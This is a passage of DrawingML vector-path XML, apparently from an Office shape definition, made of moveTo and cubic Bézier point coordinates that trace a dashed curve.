                  <a:cubicBezTo>
                    <a:pt x="803" y="36"/>
                    <a:pt x="801" y="34"/>
                    <a:pt x="799" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="792" y="36"/>
                    <a:pt x="786" y="38"/>
                    <a:pt x="780" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="41"/>
                    <a:pt x="776" y="43"/>
                    <a:pt x="777" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="47"/>
                    <a:pt x="780" y="48"/>
                    <a:pt x="782" y="48"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="744" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="750" y="57"/>
                    <a:pt x="756" y="55"/>
                    <a:pt x="763" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="53"/>
                    <a:pt x="766" y="50"/>
                    <a:pt x="765" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="765" y="46"/>
                    <a:pt x="762" y="45"/>
                    <a:pt x="760" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754" y="48"/>
                    <a:pt x="747" y="50"/>
                    <a:pt x="741" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="52"/>
                    <a:pt x="738" y="55"/>
                    <a:pt x="738" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="59"/>
                    <a:pt x="741" y="60"/>
                    <a:pt x="744" y="59"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="706" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="712" y="70"/>
                    <a:pt x="718" y="68"/>
                    <a:pt x="725" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="65"/>
                    <a:pt x="728" y="63"/>
                    <a:pt x="727" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="726" y="58"/>
                    <a:pt x="724" y="57"/>
                    <a:pt x="722" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="60"/>
                    <a:pt x="709" y="62"/>
                    <a:pt x="703" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="65"/>
                    <a:pt x="700" y="68"/>
                    <a:pt x="701" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="72"/>
                    <a:pt x="704" y="73"/>
                    <a:pt x="706" y="72"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="669" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="675" y="84"/>
                    <a:pt x="681" y="82"/>
                    <a:pt x="687" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="78"/>
                    <a:pt x="690" y="76"/>
                    <a:pt x="689" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="72"/>
                    <a:pt x="686" y="71"/>
                    <a:pt x="684" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="678" y="74"/>
                    <a:pt x="672" y="77"/>
                    <a:pt x="666" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="663" y="80"/>
                    <a:pt x="662" y="82"/>
                    <a:pt x="663" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="86"/>
                    <a:pt x="666" y="87"/>
                    <a:pt x="669" y="87"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="632" y="102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="638" y="99"/>
                    <a:pt x="644" y="97"/>
                    <a:pt x="650" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="652" y="93"/>
                    <a:pt x="653" y="91"/>
                    <a:pt x="652" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="651" y="87"/>
                    <a:pt x="649" y="86"/>
                    <a:pt x="647" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="641" y="89"/>
                    <a:pt x="635" y="92"/>
                    <a:pt x="629" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="96"/>
                    <a:pt x="626" y="98"/>
                    <a:pt x="627" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="628" y="102"/>
                    <a:pt x="630" y="103"/>
                    <a:pt x="632" y="102"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="596" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="116"/>
                    <a:pt x="608" y="113"/>
                    <a:pt x="614" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="110"/>
                    <a:pt x="617" y="107"/>
                    <a:pt x="616" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="103"/>
                    <a:pt x="613" y="102"/>
                    <a:pt x="611" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="604" y="106"/>
                    <a:pt x="598" y="109"/>
                    <a:pt x="593" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="113"/>
                    <a:pt x="590" y="115"/>
                    <a:pt x="591" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="592" y="119"/>
                    <a:pt x="594" y="120"/>
                    <a:pt x="596" y="119"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="561" y="138"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="567" y="135"/>
                    <a:pt x="572" y="131"/>
                    <a:pt x="578" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="127"/>
                    <a:pt x="581" y="125"/>
                    <a:pt x="580" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="121"/>
                    <a:pt x="577" y="120"/>
                    <a:pt x="575" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="124"/>
                    <a:pt x="563" y="127"/>
                    <a:pt x="557" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="132"/>
                    <a:pt x="554" y="134"/>
                    <a:pt x="555" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="138"/>
                    <a:pt x="559" y="139"/>
                    <a:pt x="561" y="138"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="526" y="157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="154"/>
                    <a:pt x="538" y="151"/>
                    <a:pt x="543" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="545" y="146"/>
                    <a:pt x="546" y="144"/>
                    <a:pt x="545" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="544" y="140"/>
                    <a:pt x="541" y="139"/>
                    <a:pt x="539" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="534" y="144"/>
                    <a:pt x="528" y="147"/>
                    <a:pt x="522" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="520" y="152"/>
                    <a:pt x="520" y="154"/>
                    <a:pt x="521" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="522" y="158"/>
                    <a:pt x="524" y="159"/>
                    <a:pt x="526" y="157"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="492" y="178"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="175"/>
                    <a:pt x="504" y="171"/>
                    <a:pt x="509" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="167"/>
                    <a:pt x="512" y="164"/>
                    <a:pt x="511" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="509" y="160"/>
                    <a:pt x="507" y="160"/>
                    <a:pt x="505" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="165"/>
                    <a:pt x="494" y="168"/>
                    <a:pt x="488" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486" y="173"/>
                    <a:pt x="486" y="175"/>
                    <a:pt x="487" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="179"/>
                    <a:pt x="491" y="180"/>
                    <a:pt x="492" y="178"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="459" y="201"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="465" y="197"/>
                    <a:pt x="470" y="193"/>
                    <a:pt x="476" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="188"/>
                    <a:pt x="478" y="186"/>
                    <a:pt x="477" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="182"/>
                    <a:pt x="473" y="182"/>
                    <a:pt x="471" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="187"/>
                    <a:pt x="460" y="190"/>
                    <a:pt x="455" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="195"/>
                    <a:pt x="453" y="198"/>
                    <a:pt x="454" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="202"/>
                    <a:pt x="458" y="202"/>
                    <a:pt x="459" y="201"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="427" y="224"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="220"/>
                    <a:pt x="438" y="216"/>
                    <a:pt x="443" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="211"/>
                    <a:pt x="445" y="209"/>
                    <a:pt x="444" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="205"/>
                    <a:pt x="440" y="205"/>
                    <a:pt x="438" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="210"/>
                    <a:pt x="428" y="214"/>
                    <a:pt x="422" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="219"/>
                    <a:pt x="420" y="222"/>
                    <a:pt x="422" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="225"/>
                    <a:pt x="425" y="226"/>
                    <a:pt x="427" y="224"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="249"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="245"/>
                    <a:pt x="406" y="241"/>
                    <a:pt x="411" y="236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="235"/>
                    <a:pt x="414" y="233"/>
                    <a:pt x="412" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="229"/>
                    <a:pt x="408" y="229"/>
                    <a:pt x="407" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="234"/>
                    <a:pt x="396" y="239"/>
                    <a:pt x="391" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="244"/>
                    <a:pt x="389" y="247"/>
                    <a:pt x="390" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="250"/>
                    <a:pt x="394" y="250"/>
                    <a:pt x="396" y="249"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="275"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="270"/>
                    <a:pt x="376" y="266"/>
                    <a:pt x="381" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="260"/>
                    <a:pt x="383" y="258"/>
                    <a:pt x="381" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="254"/>
                    <a:pt x="377" y="254"/>
                    <a:pt x="375" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="260"/>
                    <a:pt x="365" y="264"/>
                    <a:pt x="360" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="270"/>
                    <a:pt x="359" y="273"/>
                    <a:pt x="360" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="276"/>
                    <a:pt x="364" y="276"/>
                    <a:pt x="366" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="275"/>
                    <a:pt x="366" y="275"/>
                    <a:pt x="366" y="275"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="336" y="302"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="297"/>
                    <a:pt x="346" y="293"/>
                    <a:pt x="351" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="287"/>
                    <a:pt x="353" y="284"/>
                    <a:pt x="351" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="281"/>
                    <a:pt x="347" y="281"/>
                    <a:pt x="345" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="287"/>
                    <a:pt x="336" y="291"/>
                    <a:pt x="331" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="298"/>
                    <a:pt x="329" y="300"/>
                    <a:pt x="331" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="303"/>
                    <a:pt x="335" y="303"/>
                    <a:pt x="336" y="302"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="330"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="325"/>
                    <a:pt x="317" y="320"/>
                    <a:pt x="322" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="314"/>
                    <a:pt x="324" y="312"/>
                    <a:pt x="322" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="309"/>
                    <a:pt x="318" y="309"/>
                    <a:pt x="316" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="315"/>
                    <a:pt x="307" y="320"/>
                    <a:pt x="302" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="326"/>
                    <a:pt x="301" y="328"/>
                    <a:pt x="302" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="332"/>
                    <a:pt x="306" y="332"/>
                    <a:pt x="308" y="330"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="359"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="354"/>
                    <a:pt x="290" y="349"/>
                    <a:pt x="294" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="343"/>
                    <a:pt x="296" y="340"/>
                    <a:pt x="294" y="339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="337"/>
                    <a:pt x="290" y="337"/>
                    <a:pt x="288" y="339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="344"/>
                    <a:pt x="279" y="349"/>
                    <a:pt x="275" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="355"/>
                    <a:pt x="273" y="358"/>
                    <a:pt x="275" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="361"/>
                    <a:pt x="279" y="361"/>
                    <a:pt x="281" y="359"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="254" y="389"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="384"/>
                    <a:pt x="263" y="379"/>
                    <a:pt x="267" y="374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="372"/>
                    <a:pt x="269" y="370"/>
                    <a:pt x="267" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="367"/>
                    <a:pt x="263" y="367"/>
                    <a:pt x="261" y="369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="374"/>
                    <a:pt x="253" y="379"/>
                    <a:pt x="248" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="386"/>
                    <a:pt x="247" y="388"/>
                    <a:pt x="249" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="391"/>
                    <a:pt x="253" y="391"/>
                    <a:pt x="254" y="389"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="229" y="420"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="415"/>
                    <a:pt x="238" y="410"/>
                    <a:pt x="242" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="403"/>
                    <a:pt x="243" y="400"/>
                    <a:pt x="241" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="398"/>
                    <a:pt x="237" y="398"/>
                    <a:pt x="236" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="405"/>
                    <a:pt x="227" y="410"/>
                    <a:pt x="223" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="417"/>
                    <a:pt x="222" y="420"/>
                    <a:pt x="224" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="422"/>
                    <a:pt x="228" y="422"/>
                    <a:pt x="229" y="420"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="452"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="447"/>
                    <a:pt x="213" y="442"/>
                    <a:pt x="217" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="434"/>
                    <a:pt x="218" y="432"/>
                    <a:pt x="217" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="429"/>
                    <a:pt x="212" y="430"/>
                    <a:pt x="211" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="437"/>
                    <a:pt x="203" y="442"/>
                    <a:pt x="199" y="448"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="449"/>
                    <a:pt x="198" y="452"/>
                    <a:pt x="200" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="455"/>
                    <a:pt x="204" y="454"/>
                    <a:pt x="206" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="452"/>
                    <a:pt x="206" y="452"/>
                    <a:pt x="206" y="452"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="480"/>
                    <a:pt x="190" y="474"/>
                    <a:pt x="194" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="467"/>
                    <a:pt x="195" y="464"/>
                    <a:pt x="193" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="462"/>
                    <a:pt x="189" y="462"/>
                    <a:pt x="188" y="464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="470"/>
                    <a:pt x="180" y="475"/>
                    <a:pt x="176" y="481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="483"/>
                    <a:pt x="176" y="485"/>
                    <a:pt x="177" y="486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="488"/>
                    <a:pt x="182" y="487"/>
                    <a:pt x="183" y="485"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="519"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="513"/>
                    <a:pt x="169" y="508"/>
                    <a:pt x="172" y="502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="500"/>
                    <a:pt x="173" y="498"/>
                    <a:pt x="171" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="495"/>
                    <a:pt x="167" y="496"/>
                    <a:pt x="165" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="503"/>
                    <a:pt x="158" y="509"/>
                    <a:pt x="155" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="517"/>
                    <a:pt x="154" y="519"/>
                    <a:pt x="156" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="521"/>
                    <a:pt x="160" y="521"/>
                    <a:pt x="162" y="519"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="141" y="554"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="548"/>
                    <a:pt x="148" y="542"/>
                    <a:pt x="151" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="534"/>
                    <a:pt x="152" y="532"/>
                    <a:pt x="150" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="530"/>
                    <a:pt x="146" y="530"/>
                    <a:pt x="144" y="532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="538"/>
                    <a:pt x="138" y="544"/>
                    <a:pt x="134" y="550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="552"/>
                    <a:pt x="134" y="554"/>
                    <a:pt x="136" y="555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="556"/>
                    <a:pt x="140" y="555"/>
                    <a:pt x="141" y="554"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="589"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="583"/>
                    <a:pt x="129" y="577"/>
                    <a:pt x="132" y="571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="569"/>
                    <a:pt x="132" y="567"/>
                    <a:pt x="130" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="565"/>
                    <a:pt x="126" y="565"/>
                    <a:pt x="125" y="567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="573"/>
                    <a:pt x="119" y="579"/>
                    <a:pt x="116" y="585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="587"/>
                    <a:pt x="115" y="590"/>
                    <a:pt x="117" y="591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="592"/>
                    <a:pt x="122" y="591"/>
                    <a:pt x="123" y="589"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="105" y="625"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="619"/>
                    <a:pt x="111" y="613"/>
                    <a:pt x="114" y="607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="605"/>
                    <a:pt x="114" y="602"/>
                    <a:pt x="112" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="600"/>
                    <a:pt x="107" y="601"/>
                    <a:pt x="107" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="609"/>
                    <a:pt x="101" y="615"/>
                    <a:pt x="98" y="621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="623"/>
                    <a:pt x="98" y="626"/>
                    <a:pt x="100" y="627"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="628"/>
                    <a:pt x="104" y="627"/>
                    <a:pt x="105" y="625"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="89" y="661"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="655"/>
                    <a:pt x="94" y="649"/>
                    <a:pt x="97" y="643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="641"/>
                    <a:pt x="97" y="639"/>
                    <a:pt x="95" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="637"/>
                    <a:pt x="91" y="638"/>
                    <a:pt x="90" y="640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="646"/>
                    <a:pt x="84" y="652"/>
                    <a:pt x="82" y="658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="660"/>
                    <a:pt x="82" y="663"/>
                    <a:pt x="84" y="664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="664"/>
                    <a:pt x="88" y="663"/>
                    <a:pt x="89" y="661"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="74" y="699"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="692"/>
                    <a:pt x="79" y="686"/>
                    <a:pt x="82" y="680"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="678"/>
                    <a:pt x="81" y="676"/>
                    <a:pt x="79" y="675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="674"/>
                    <a:pt x="75" y="675"/>
                    <a:pt x="74" y="677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="683"/>
                    <a:pt x="69" y="690"/>
                    <a:pt x="67" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="698"/>
                    <a:pt x="67" y="700"/>
                    <a:pt x="69" y="701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="702"/>
                    <a:pt x="74" y="701"/>
                    <a:pt x="74" y="699"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="61" y="736"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="730"/>
                    <a:pt x="65" y="724"/>
                    <a:pt x="68" y="717"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="715"/>
                    <a:pt x="67" y="713"/>
                    <a:pt x="65" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="712"/>
                    <a:pt x="61" y="713"/>
                    <a:pt x="60" y="715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="721"/>
                    <a:pt x="56" y="728"/>
                    <a:pt x="54" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="736"/>
                    <a:pt x="54" y="738"/>
                    <a:pt x="56" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="740"/>
                    <a:pt x="60" y="739"/>
                    <a:pt x="61" y="736"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="49" y="775"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="768"/>
                    <a:pt x="53" y="762"/>
                    <a:pt x="55" y="756"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="753"/>
                    <a:pt x="54" y="751"/>
                    <a:pt x="52" y="751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="750"/>
                    <a:pt x="48" y="751"/>
                    <a:pt x="47" y="753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="760"/>
                    <a:pt x="43" y="766"/>
                    <a:pt x="42" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="775"/>
                    <a:pt x="42" y="777"/>
                    <a:pt x="44" y="777"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="778"/>
                    <a:pt x="49" y="777"/>
                    <a:pt x="49" y="775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="775"/>
                    <a:pt x="49" y="775"/>
                    <a:pt x="49" y="775"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="39" y="813"/>
                  </a:moveTo>
                  <a:cubicBezTo>
